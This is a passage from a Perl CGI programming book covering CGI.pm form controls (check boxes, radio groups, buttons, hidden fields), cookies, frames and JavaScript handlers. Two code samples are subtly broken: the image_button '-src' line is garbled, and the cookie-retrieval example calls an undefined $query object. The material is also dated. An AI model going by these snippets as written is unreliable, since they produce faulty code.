-multiple, when set to true, allows multiple selections. Otherwise, only
one item can be selected at a time. -labels is the same as it is for pop-up
menus.
Check Boxes
You use the checkbox() method to create standalone check boxes. If you
have a group of check boxes that are logically linked together, you can use checkbox_group().
print $cgi->checkbox( -name=>'checkbox_name',
-checked=>'checked',
-value=>'ON',
-label=>'Check me!');
-name is a parameter containing the name of the check box; it is the
only required parameter. The check box's name is also used as a readable label next
to the check box itself, unless -label specifies otherwise. -checked
is set to checked if it is to be checked by default. -value specifies the
value of the check box when checked. -label specifies what should appear
next to the check box.
Check Box Groups
checkbox_group(), shown here, is the method you use to create a number
of check boxes that are logically linked together and whose behavior can be affected
by the other boxes.
print $cgi->checkbox_group( -name=>'group_name',
-values=>['uno', 'dos', 'tres'],
-default=>'dos',
-linebreak=>'true',
-labels=>%labels);
-name and -values, which are required, function just as they
do for standalone check boxes. All other parameters are optional. -default
is either a list of values or the name of a single value to be checked by default.
If -linebreak is set to true, linebreaks are placed between each check box,
making them appear in a vertical list. Otherwise, they are listed right next to each
other on the same line. -labels is an associative array of labels for each
value, just as in pop-up menus. If -nolabels is specified, no labels are
printed next to the buttons.
If you want to generate an html3 table with your check boxes in it, you can do
so by using the -rows and -columns parameters. If these parameters
are set, all the check boxes in the group are put into an html3 table that uses the
number of rows and columns specified. If you like, you can omit -rows, and
the correct number is calculated for you (based on the value you specify in -columns).
Additionally, you can use -rowheaders and -colheaders parameters
to add headings to your rows and columns. Both of these parameters like to be fed
a pointer to an array of headings. They are purely decorative; they don't change
how your check boxes are interpreted.
print $cgi->checkbox_group( -name=>'group_name',
-values=>['sun', 'sgi', 'ibm', 'dec'],
-rows=>2, -columns=>2);
Radio Button Groups
You use the radio_group() method to create logical groups of radio buttons.
Turning on one button in a radio group turns off all the others. As a result, -default
accepts only a single value (instead of a list, as it can with check box groups).
Otherwise, the methods for radio button groups are the same as for check box groups.
Submit Buttons
Forms are pretty useless unless you can submit them. So, the CGI module provides
the submit() method, which is shown here. Available parameters are -name
and -value. -name associates a name to a specific button. (This
capability is useful when you have multiple buttons on the same page and want to
differentiate them.) -value is what is passed to your program in the query
string, and also appears as a label for the submit button. Both parameters are optional.
print $cgi->submit( -name=>'button_name',
-value=>'value');
Reset Buttons
Reset buttons are straightforward: clicking the reset button undoes whatever changes
the user has made to the form and presents a fresh one for mangling.
print $cgi->reset;
Defaults Buttons
The defaults() method, shown here, resets a form to its defaults. This
method is different from reset(), which just undoes whatever changes the
user has made by typing in the fields. Reset buttons do not override query strings,
but defaults buttons do. This difference between the two is small but important.
If an argument is given, it is used as the label for the button. Otherwise, the button
is labeled Defaults.
print $cgi->defaults('button_label');
Hidden Fields
The hidden() method, shown here, produces a text field that's invisible
to the user. This capability is useful for passing form data from one form to another,
when you don't want to clutter up the screen with information that the user doesn't
need to see every time.
print $cgi->hidden( -name=>'field_name',
-default=>['value1', 'value2', 'value3']);
Both parameters must be given. As in other cases, the second can be
an anonymous array or a reference to a named array.
Clickable Image Buttons
So you aren't satisfied to have plain old hypertext as your link? Want to
use an image instead? Then use the image_button() method as follows:
print $cgi->image_button( -name=>'button_name',
-src=1787/clickMe.gif',
-align=>'middle',
-alt=>'Click Me!');
When you use image_button(), only -name and -src are
required. When the image is clicked, not only is the form submitted, but the x
and y coordinates indicating where the image was clicked are also submitted
via two parameters: button_name.x and button_name.y.
JavaScript Buttons
button(), shown here, creates a JavaScript button. This means that JavaScript
code referenced in -onClick is executed. Note that this method doesn't work
at all if the browser doesn't understand JavaScript, if the browser has this feature
turned off, or if the browser is behind a firewall that filters out JavaScript.
print $cgi->button( -name=>'big_red_button',
-value=>'Click Me!',
-onClick=>'doButton(this)');
Additional Considerations
Sometimes using Perl's print statement to send straight HTML to the client is
just better. An example might be when you're implementing a table that contains information
read from a file. It's probably better to use print to open the <TABLE>
tag, use the methods to return the contents of the table, and then another print
to close the table. Doing absolutely everything from a CGI method might be preferred
by an object purist, but in practice, sometimes sticking a print statement with raw
HTML in your program just makes more sense (from the standpoints of simplicity and
readability).
Because the CGI modules are continually being enhanced, be sure to check the CGI.pm
documentation for the complete list of methods, parameters, and features. You can
find the documentation on the Web at
http://www.genome.wi.mit.edu/ftp/pub/software/WWW/cgi_docs.html
Netscape Cookies
Using cookies is another way to maintain state information. A cookie is simply
a bit of data that contains a number of name/value pairs passed between the client
and the server in the HTTP header rather than in the query string. In addition to
name/value pairs, several other optional attributes exist.
The following is a sample cookie that demonstrates how to use the method:
$my_cookie = $cgi->cookie( -name=>'myBigCookie',
-value=>'chocolate chip',
-expires=>'+5y',
-path=>'/cgi-bin',
-domain=>'.example.com',
-secure=>1);
print $cgi->header(-cookie=>$my_cookie);
The cookie() method creates a new cookie. Its parameters are as follow:
- -name
- This required parameter identifies the cookie.
- -value
- This parameter indicates the cookie's value. It can be a scalar value, array
reference, or associative array reference.
- -path
- This parameter indicates the partial path in which the cookie is valid.
- -domain
- This parameter indicates the partial domain for which the cookie is valid.
- -expires
- This parameter indicates the expiration date for the cookie. The format is the
same as described in the HTTP headers section.
- -secure
- If this parameter is set to 1, the cookie is used only in an SSL session.
- Cookies created with the cookie() method must be sent in the HTTP header
via the header() method as follows:
print $cgi->header(-cookie=>$my_cookie);
You can send multiple cookies by passing an array reference to header(),
naming each cookie to be sent:
print $cgi->header(-cookie=>[$cookie1, $cookie2]);
To retrieve a cookie, you can request it by name using the cookie() method without
the -value parameter:
use CGI;
$cgi = new CGI;
$stuff = $query->cookie(-name=>'stuff');
To delete a cookie, send a blank cookie with the same name as the one you want
to delete, and specify the expiration date to something in the past.
Note that cookies have some limitations. The client cannot store more than 300
cookies at any one time. Each cookie cannot be any longer than four kilobytes, including
its name. No more than 20 cookies can be specified per domain.
Netscape Frames
You can support frames from within CGI.pm in two ways:
- Direct the output of a program into a frame with the specified name, as follows.
If the named frame doesn't exist, a new window pops up with the specified code in
it.
$cgi = new CGI;
print $cgi->header(-target=>'_myFrame');
- Provide the frame's name as an argument to the -target parameter using the start_form()
method:
print $cgi->start_form(-target=>'another_frame');
- Because using frames well can be difficult, splitting the program into logical
sections is often best. For example, if a page has multiple frames, making one part
of the program create the frames and having a separate section of the program handle
each frame might be best.
JavaScript
JavaScript is a useful interpreted language that runs inside the browser. It was
introduced in Netscape version 2 as "LiveScript," but its name was almost
immediately changed to JavaScript, and it was made to look similar to Java. Having
code execute on the client side is nice, especially for CGI purposes, because you
can perform tasks such as form validation on the client side, forcing the load of
user-interface-oriented tasks to be processed on the client (where it belongs) rather
than on your server (where it doesn't).
Again, using the JavaScript features of CGI.pm requires that you know JavaScript.
JavaScript events are available only in cases in which they are applicable.
To register a JavaScript event handler with an HTML element, simply name the appropriate
parameter, and pass it any arguments you need when calling the CGI method. For example,
if you want to have a text field's contents be validated as soon as a user makes
a change to it, you can do so this way:
print $q->textfield( -name=>'height',
-onChange=>"validateHeight(this)");
Of course, for this approach to work, validateHeight() must be an existing
function. You make it an existing function by incorporating it in a <SCRIPT>
block by using the -script parameter to the start_html method.
Summary
Perl is an excellent language for writing CGI applications. Given its flexibility,
speed, portability, and the wealth of CGI-related Perl resources available, there
is very little that can't be done. Perl is used to develop the vast majority of CGI
programs on the web, and after seeing how well Perl does the job, it's easy to see
why.
CGI programming is a powerful and fun way to accomplish many of the tasks relating
to allowing users to interact with huge amounts of data. Information can be as dynamic
or as static as you like.
As the Web becomes closer to the long-sought dream of an easy-to-use, ubiquitous
user interface, using CGI to look at data makes sense rather than using the proprietary
interfaces that typically exist. Because CGI is a program running on your server,
though, it typically has access to data that you might not want to give to everyone.
(For example, a corporate network might have a CGI interface to a certain subset
of an employee database, which might also include information such as payroll, social
security numbers, and so on that shouldn't be "public" knowledge.) Therefore,
you need to take some precautions related to security, just to make sure that your
program won't be tricked into giving out sensitive information that it otherwise
wouldn't give.
The Perl community is one of the most helpful on the Net. Regardless of whether
you're just learning to program or are already a wizard, a plethora of people on
the comp.lang.perl.* newsgroups are willing to help you solve any problems
that you're confronted with. (They won't write the programs for you, for the most
part, but they'll do more than that: they'll help you figure out how to solve your
own problems. So the next time, you won't have to ask anyone.) Do your part to keep
the community like it is: When you see that someone is asking a question, and you
can provide some help, do so. If you've written a useful module, share it.
Because of Perl's powerful regular expressions, object-oriented capabilities,
and the huge library of free Perl modules to handle interfaces to various databases,
CGI, encryption systems, and so on, Perl is a great language for safe and powerful
CGI programming.
©Copyright,
Macmillan Computer Publishing. All rights reserved.
|